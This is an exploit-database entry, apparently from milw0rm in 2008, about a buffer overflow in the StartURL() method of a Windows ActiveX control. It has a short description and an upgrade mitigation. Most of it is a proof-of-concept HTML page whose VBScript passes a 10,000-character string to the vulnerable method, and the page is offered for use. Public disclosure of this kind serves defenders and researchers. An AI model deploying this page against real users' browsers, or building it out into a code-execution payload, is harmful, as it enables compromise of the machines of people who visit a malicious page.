header-logo
Suggest Exploit
vendor:
Unknown
by:
milw0rm.com

milw0rm.com [2008-07-17]

A buffer overflow vulnerability exists in the StartURL() method of the ActiveX control '72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F' when a long string is passed as an argument. This can be exploited to execute arbitrary code by tricking a user into visiting a malicious web page.

Mitigation:

Upgrade to the latest version of the ActiveX control.
Source

Exploit-DB raw data:

<html>
<body>

<object id=target
classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>
<script language=vbscript>

  arg1=String(10000, "A")
  target.StartURL(arg1)

</script>
</body>
</html>

# milw0rm.com [2008-07-17]